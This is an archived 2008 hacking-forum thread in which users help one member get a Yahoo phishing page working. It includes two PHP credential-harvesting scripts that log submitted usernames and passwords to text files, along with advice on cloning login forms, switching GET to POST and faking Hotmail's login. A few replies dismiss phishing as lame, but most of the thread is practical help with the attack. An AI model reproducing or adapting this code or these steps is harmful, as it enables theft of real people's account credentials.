PDA

View Full Version : Need help phishing


DoG MikkyW
November 22nd, 2008, 11:39 AM
I need some help phishing yahoo, I'm having quite a bit of trouble with it. I don't think it's my php code either. Any help would be appreciated. Also, all of those who would like a site which is very hard to phish, go to hotmail.com which is almost impossible. Anyways, here is my php code
<?php>
header("Location: http://yahoo.com");
$handle = fopen("random.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

deathlord888
November 22nd, 2008, 12:31 PM
i dont think it is your PHP also
how do you have the rest of it set up?
and hotmail is not that hard
just print screen then add in your own password field and username field

DoG MikkyW
November 22nd, 2008, 01:19 PM
Good idea on the hotmail. Yahoo has only one form action on the whole login page, and that is for the login, so where it said <form action="blablbahalhbjl" I replaced with <form action="login.php" My phishing page is at seanslogin.t35.com/Yahoo/pulogin.html

deathlord888
November 22nd, 2008, 01:45 PM
ya that is wierd it is working just not posting the info
and you might want to move the pass/name fields over they look a bit off to me

DoG MikkyW
November 22nd, 2008, 06:00 PM
Yeah, I figured maybe yahoo did something weird to their pass/name fields, so I deleted them and made some myself. Also, I moved the files into the root directory to see if that would change anything... they are now located at seanslogin.t35.com/pulogin.html , it saves to the random.txt file in the root directory. UPDATE:::
IT'S WORKING!!! Talked to ishkur. Use post when talking about forms, and get when talking about urls, I was using a form, so I had to switch my form method to post, and my php values to $_POST..!!!

deathlord888
November 22nd, 2008, 06:29 PM
is it working now?

DoG MikkyW
November 23rd, 2008, 12:47 AM
yessir....

deathlord888
November 23rd, 2008, 09:53 AM
ya ishy knows all about this stuff

deathlord888
November 23rd, 2008, 09:57 AM
trying to phish enough types eh lol

DoG MikkyW
November 26th, 2008, 08:22 AM
I never claimed that... I've never even seen one of your phishing sites... I claimed you can't do shit other than VB. And I'm just using phishing as a quick means of gaining access.

deathlord888
November 26th, 2008, 11:07 AM
i dont phish
it is lame
and really gay

Lockdown
November 26th, 2008, 04:31 PM
Next time why not go with something simple like:

<?php
$email = htmlentities($_POST['email'], ENT_QUOTES, "UTF-8");
$pass =htmlentites($_POST['pass'], ENT_QUOTES, "UTF-8");

$fp = fopen('accounts.txt', 'a+');
fwrite($fp, $email . ":" . $pass);
fclose($fp);
?>

I haven't done some PHP in a while so there might be some errors in there, but that is a simple version of what your trying to do..

deathlord888
November 26th, 2008, 04:51 PM
he went this way because he jacked palmers code and modified it

Lockdown
November 26th, 2008, 04:58 PM
At deathlord888 way above. Phishing is lame.

deathlord888
November 26th, 2008, 05:29 PM
yup it takes no skill
especially since i know he did not write the PHP anyway

deathlord888
December 7th, 2008, 10:42 AM
what is this mass?
a post that doesnt flame ? :0

deathlord888
December 7th, 2008, 01:51 PM
very much so